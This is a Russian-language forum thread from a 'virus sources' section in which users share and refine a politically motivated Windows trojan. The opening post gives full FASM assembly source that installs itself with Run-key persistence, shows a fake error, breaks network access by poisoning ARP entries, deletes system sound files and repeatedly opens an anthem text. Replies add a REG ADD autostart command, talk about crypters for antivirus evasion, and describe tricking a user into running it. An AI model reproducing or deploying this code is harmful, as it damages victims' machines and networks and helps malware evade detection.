Националистический вредонос [FASM]

Тема в разделе "Исходники вирусов", создана пользователем Антоха, 3 июн 2014.

↑ ↓
  1. Антоха Администратор
    Антоха
    Ответить в чате

    Администрация

    Регистрация:
    26.12.2012
    Сообщения:
    3.181
    Симпатии:
    11.095
    Пол:
    Мужской
    Репа:
    +11.243 / 47 / -6
    Jabber:
    Skype:
    Копирую статью с fuckav.ru
    Хай всем, может кому надо, может у кого есть знакомые из стран ЕС или НАТО.

    В свете недавних событий написал зверька с таким функционалом:

    I при старте:
    * Установка в папку Temp и ожидание перезагрузки
    * После установки выводит сообщение об ошибке
    II После перезагрузки:
    * Херит ARP кэш, добавляя статичные записи для шлюза на мак адрес 00:00:00:00:00:00
    * Удаляет звуковые файлы Windows
    * Каждые 10 секунд выводит файл с текстом гимна Российской Федерации, на английском.

    Особенности:

    * Использование виртуальной памяти для массивов, поэтому весит всего лишь 3,5 КБ ( из-за текста гимна России внутри )

    Как видите, основная фишка в :

    Каждые 10 секунд выводит файл с текстом гимна Российской Федерации, на английском.

    Можно сильно разозлить, или обидеть, западных соседей.
    Код:
    include 'win32ax.inc'
     
    section '.data' data readable writeable
    MasAddr dd 0
    TempAddr dd 0
    WinAddr dd 0
    RussiaAddr dd 0
    FileName db 
    'std.exe',0
    AutoKey db 
    'Software\Microsoft\Windows\CurrentVersion\Run',0
    ValueName db 
    'stdcall',0
    ErrorMessage db 
    'An error occurred during initialization the program',0
    ErrorTitle db 
    'Fatal Error',0
    hkey dd 
    ?
    hFile dd 0
    open    db 
    'open',0
    cmd    db 
    'cmd.exe',0
     
    proc    CommandExecution CommandAddr 
    DWORD
    jmp 
    @@100
    @@100:
    push    SW_HIDE
    push    
    [WinAddr]
    push    [CommandAddr]
    push    cmd
    push    open
    push    0
    call    
    [ShellExecute]
    ret
    endp
     
    section 
    '.code' code readable executable
    start
    :
     
    invoke  VirtualAlloc01280MEM_COMMITPAGE_READWRITE
     
    mov    
    [MasAddr], eax
    mov    
    [TempAddr], eax
    add    
    [TempAddr], MAX_PATH
    inc    
    [TempAddr]
    push    MAX_PATH
    push    
    [MasAddr]
    push    0
    call    
    [GetModuleFileName]
     
     
    push    [TempAddr]
    push    MAX_PATH
    call    
    [GetTempPath]
     
    push    FileName
    push    
    [TempAddr]
    call    [lstrcat]
     
    push    [MasAddr]
    push    [TempAddr]
    call    [lstrcmpi]
    test    eaxeax
    je      
    @@10
     
    push    0
    push    
    [TempAddr]
    push    [MasAddr]
    call    [CopyFile]
     
    invoke RegCreateKeyExHKEY_CURRENT_USER,AutoKey,NULL,NULL,NULL,KEY_ALL_ACCESS,NULL,hkey,NULL
    invoke lstrlen
    , [TempAddr]
    invoke RegSetValueEx,[hkey],ValueName,NULL,REG_SZ,[TempAddr],eax
    invoke RegCloseKey
    ,[hkey]
     
    push    MB_ICONERROR
    push    ErrorTitle
    push    ErrorMessage
    push    0
    call    
    [MessageBox]
     
    push    0
    call    
    [ExitProcess]
     
    @@
    10:
    mov    eax, [MasAddr]
    mov    ebx256
    imul    ebx
    2
    inc    ebx
    add    eax
    ebx
    mov    
    [WinAddr], eax
    push    MAX_PATH
    push    
    [WinAddr]
    call    [GetWindowsDirectory]
    jmp    @@20
    command_1 db 
    '/c arp -d *',0
    command_2 db 
    '/c arp -s 192.168.1.1 00:00:00:00:00:00',0
    command_3 db 
    '/c arp -s 192.168.0.1 00:00:00:00:00:00',0
    command_4 db 
    '/c del %SystemDrive%\Windows\Media\*.wav /Q /S',0
    file_1_
    :
    file_1 file 'anthem.txt'
    file_1_sz dd $ - file_1_
    AnthemName db 
    'anthem.txt',0
    @@20:
    lea    eax, [command_1]
    push    eax
    call    CommandExecution
     
    push    1000
    call    
    [Sleep]
     
    lea    eax, [command_2]
    push    eax
    call    CommandExecution
     
    lea    eax
    , [command_3]
    push    eax
    call    CommandExecution
     
    lea    eax
    , [command_4]
    push    eax
    call    CommandExecution
     
    mov    eax
    , [WinAddr]
    add    eax256
    inc    eax
    mov    
    [RussiaAddr], eax
     
    push    
    [RussiaAddr]
    push    MAX_PATH
    call    
    [GetTempPath]
    push    AnthemName
    push    
    [RussiaAddr]
    call    [lstrcat]
     
    invoke  CreateFile, [RussiaAddr], GENERIC_WRITE00CREATE_ALWAYSFILE_ATTRIBUTE_NORMALNULL
    mov    
    [hFile], eax
    invoke  WriteFile
    , [hFile], file_1, [file_1_sz], esp0
    push    
    [hFile]
    call    [CloseHandle]
     
    xor    
    ebxebx
    @@30:
     
    push    SW_SHOW
    push    ebx
    push    ebx
    push    
    [RussiaAddr]
    push    open
    push    ebx
    call    
    [ShellExecute]
     
    push    10000
    call    
    [Sleep]
    jmp @@30
     
    .end start
    Название файла:[/B] Cyb.exe
    Размер файла: 3584 байт
    Дата сканирования: Tue, 03 Jun 14 11:14:35 -0400
    MD5-хэш файла: cb80a0e5201b2be5d70a29de5dd8154b

    Результат: 6 из 38

    Ad-Aware: OK
    AhnLab V3 Internet Security: OK
    ArcaVir: OK
    Avast: OK
    AVG: OK
    Avira: TR/ATRAPS.Gen Trojan!
    Bitdefender/BullGuard: OK
    BullGuard Internet Security 2013: OK
    ClamAV (UNIX version): PUA.Win32.Packer.PrivateExeProte-15
    Comodo: OK
    Dr.Web: OK
    Emsisoft Anti-Malware (a-squared Anti-Malware): OK
    eScan Internet Security Suite 14: OK
    Fortinet 5: OK
    F-Prot: Malware detected
    F-Secure 2014: OK
    G Data: OK
    IKARUS: OK
    Immunet: OK
    K7 Ultimate: OK
    Kaspersky Internet Security 2014: HEUR:Trojan.Win32.Generic
    McAfee Total Protection 2013: OK
    Microsoft Security Essentials: OK
    NANO: OK
    NOD32: OK
    Norman: OK
    Norton Internet Security: OK
    Outpost Security Suite Pro 8.0: OK
    Panda Antivirus: OK
    Quick Heal: OK
    Sophos: OK
    SUPERAntiSpyware: OK
    Total Defense Internet Security: OK
    Trendmicro Titanium Internet Security: OK
    Twister Antivirus 8: Suspicious:Worm.Palevo.jub.zxfk.mg
    VBA: BScope.Dropper.Gen.16
    VIPRE Internet Security 2013: OK
    Virit: OK]
    Файл anthem.txt:
    Код:
    Russia – our sacred homeland,
    Russia – our beloved country.
    A mighty willgreat glory –
    These are your heritage 
    for all time!
     
    Be gloriousour free Fatherland,
    Age-old union of fraternal peoples,
    Ancestor-given wisdom of the people!
    Be gloriousour countryWe are proud of you!
     
    From the southern seas to the polar lands
    Spread are our forests 
    and fields.
    You are unique in the worldone of a kind –
    This native land 
    protected by God!
     
    Wide spaces for dreams and for living
    Are opened 
    for us by the coming years
    Our loyalty to the Fatherland gives us strength
    .
    Thus it wasthus it is and thus it always will be!
    Кидаете файл в папку с исходником.

    P.S. Если хотите другой текст, то просто измените содержимое anthem.txt =)
     
    • Мне нравится Мне нравится x 9
  2. X-Shar :)
    X-Shar
    Ответить в чате

    Администрация

    Регистрация:
    03.06.2012
    Сообщения:
    5.812
    Симпатии:
    432
    Пол:
    Мужской
    Репа:
    +966 / 152 / -29
    Jabber:
    Skype:
    ICQ:

    638294628

    Интересная задумка, сейчас глянул, но немножко переделал:

    1)При заражении выводит надпись по русски "Привет из России !"

    2)После заражения сразу выводит гимн в цикле с задержкой 10 секунд

    3)Гимн в теле программы, а не в файле...

    4)Удалил все вредоносные функции, т.к. толку от них...

    Но всё равно:https://www.virustotal.com/ru/file/...66e9016eb72aa54cbee19ebb/analysis/1402034706/

    Похоже реагирует на API винды !Отдыхай!!!

    Пароль:111, в архиве и компилятор FASM !
     

    Вложения:

    • Project.rar
      Размер файла
      982,2 КБ
      Просмотров:
      17
    • Мне нравится Мне нравится x 5
  3. NIN@ Уважаемый пользователь
    NIN@
    Ответить в чате

    Форумчанин

    Регистрация:
    26.03.2014
    Сообщения:
    434
    Симпатии:
    1.354
    Пол:
    Женский
    Репа:
    +1.367 / 4 / -0
    И всё-таки она наша wink1- наша Раша)
    Только пришлось защитника отключить, который сразу при запуске хотел съесть весь патриотизм) а антивирус на виртуалке не установлен.

    раша.
     
    • Мне нравится Мне нравится x 2
  4. wixless Житель форума
    wixless
    Ответить в чате

    Форумчанин

    Регистрация:
    31.03.2013
    Сообщения:
    39
    Симпатии:
    98
    Пол:
    Мужской
    Репа:
    +98 / 0 / -0
    Нужно бы еще найти хороший криптор, чтобы не распознавался антивирусами)
     
  5. X-Shar :)
    X-Shar
    Ответить в чате

    Администрация

    Регистрация:
    03.06.2012
    Сообщения:
    5.812
    Симпатии:
    432
    Пол:
    Мужской
    Репа:
    +966 / 152 / -29
    Jabber:
    Skype:
    ICQ:

    638294628

    Эх, зачем-же его криптовать-то, если при включенном UAC он даже не сможет добавится в автозапуск...

    Вот пять минут затратил, накидал:

    1)Будет повышать себе прова при попытке добавить в автозапуск;

    2)Реализовал проигрывание гимна любэ;

    3)Гимн в ресурсах....

    В общем-то копируется в темп, если первый раз запущен, добавит себя в автозапуск, попробует повысить права до админа, ну и далее будет проигрывать гимн + окошко...

    Накидал на делфи т.к. с асмом некогда разбираться, вес увеличился т.к. делфи + гимн в экзешнике...

    Пароль:111
     

    Вложения:

    • NachVirus.rar
      Размер файла
      819,1 КБ
      Просмотров:
      6
    • Мне нравится Мне нравится x 3
  6. Антоха Администратор
    Антоха
    Ответить в чате

    Администрация

    Регистрация:
    26.12.2012
    Сообщения:
    3.181
    Симпатии:
    11.095
    Пол:
    Мужской
    Репа:
    +11.243 / 47 / -6
    Jabber:
    Skype:
    Отчего же?На семёрке с включённым UAC,после перезагрузки окошечко вылазит.NIN@ немного умолчала как этот вредонос очутился у неё)Думаю она не обидится если я скажу.Я ей послал набросок одной прожки,но так как на компе дохера всяких папок с именем project,то вместо "хорошей" проги прислал ей этого нациста.Сказал можешь смело запускать на основной.Правда каспер задавил его втихаря.
    В архиве батник-противоядие против этого вредоноса)Запускать от админа.
     

    Вложения:

    • kill nacist.rar
      Размер файла
      161 байт
      Просмотров:
      9
    • Мне нравится Мне нравится x 4
  7. X-Shar :)
    X-Shar
    Ответить в чате

    Администрация

    Регистрация:
    03.06.2012
    Сообщения:
    5.812
    Симпатии:
    432
    Пол:
    Мужской
    Репа:
    +966 / 152 / -29
    Jabber:
    Skype:
    ICQ:

    638294628

    UAC блокирует доступ в реестре, для доступа нужны админские права-же !

    Так-же на 8-ке блокируется доступ на диск С, кроме пользовательской папки и служебных папок типа темп и т.д.

    Поэтому доступ к ветке 'Software\Microsoft\Windows\CurrentVersion\Run' должна блокироваться UAC если он включон, либо я что-то не понимаю !Не въехал!!!
     
    • Мне нравится Мне нравится x 1
  8. X-Shar :)
    X-Shar
    Ответить в чате

    Администрация

    Регистрация:
    03.06.2012
    Сообщения:
    5.812
    Симпатии:
    432
    Пол:
    Мужской
    Репа:
    +966 / 152 / -29
    Jabber:
    Skype:
    ICQ:

    638294628

    Всё разобрался, что-бы добавить при включонном UAC можно не повышать себе права, достаточно использовать ветку HKEY_CURRENT_USER

    Код:
    HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run


    Вот поправил, проверьте на 8-ке, для интереса !

    Он ничего не делает, добовляется в автозапуск + окошко гимна и музыка, окошко не закрыть будет, гы-гы...

    Процедура лечения очень простая, прибить процесс + удалить из автозапуска и всё !WinkSmile

    Пароль:111
     

    Вложения:

    • Мне нравится Мне нравится x 3
  9. X-Shar :)
    X-Shar
    Ответить в чате

    Администрация

    Регистрация:
    03.06.2012
    Сообщения:
    5.812
    Симпатии:
    432
    Пол:
    Мужской
    Репа:
    +966 / 152 / -29
    Jabber:
    Skype:
    ICQ:

    638294628

    Сам проверил, да всё работает...:utenok:


    Это для меня открытие, будет запуск для конкретного пользователя !WinkSmile


    Что делает программа, при запуске проверяет есть-ли файл start.bat, в папке темп, если нет то создаёт его с таким содержимым:
    Код:
    REG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /"chost" /t REG_SZ /"C:\Users\Пользователь\AppData\Local\Temp\Project2.exe" /f>nul
    + копируется в папку темп

    Далее запускает батник, т.е. добовляет себя в автозапуск и начинает проигрывать музыку + навязчиво открывает окно с гимном !Dmeh-Smeh-Smeh!!!

    Далее при каждом старте ничего не делает, а просто запускается и проигрывает гимн + незакрывающееся окно, такая программа-шутка получилась, защитник вроде не палит, остальные АВ не знаю...like it
     
    • Мне нравится Мне нравится x 3
  10. NIN@ Уважаемый пользователь
    NIN@
    Ответить в чате

    Форумчанин

    Регистрация:
    26.03.2014
    Сообщения:
    434
    Симпатии:
    1.354
    Пол:
    Женский
    Репа:
    +1.367 / 4 / -0
    На 8-ке всё отлично запустилось, защитник молчал, антивируса там нет 2. , а на основную только скачала, Каспер начал сразу ругаться националист. и не дал даже извлечь из архива, сразу удалил.
     
    • Мне нравится Мне нравится x 3

Поделиться этой страницей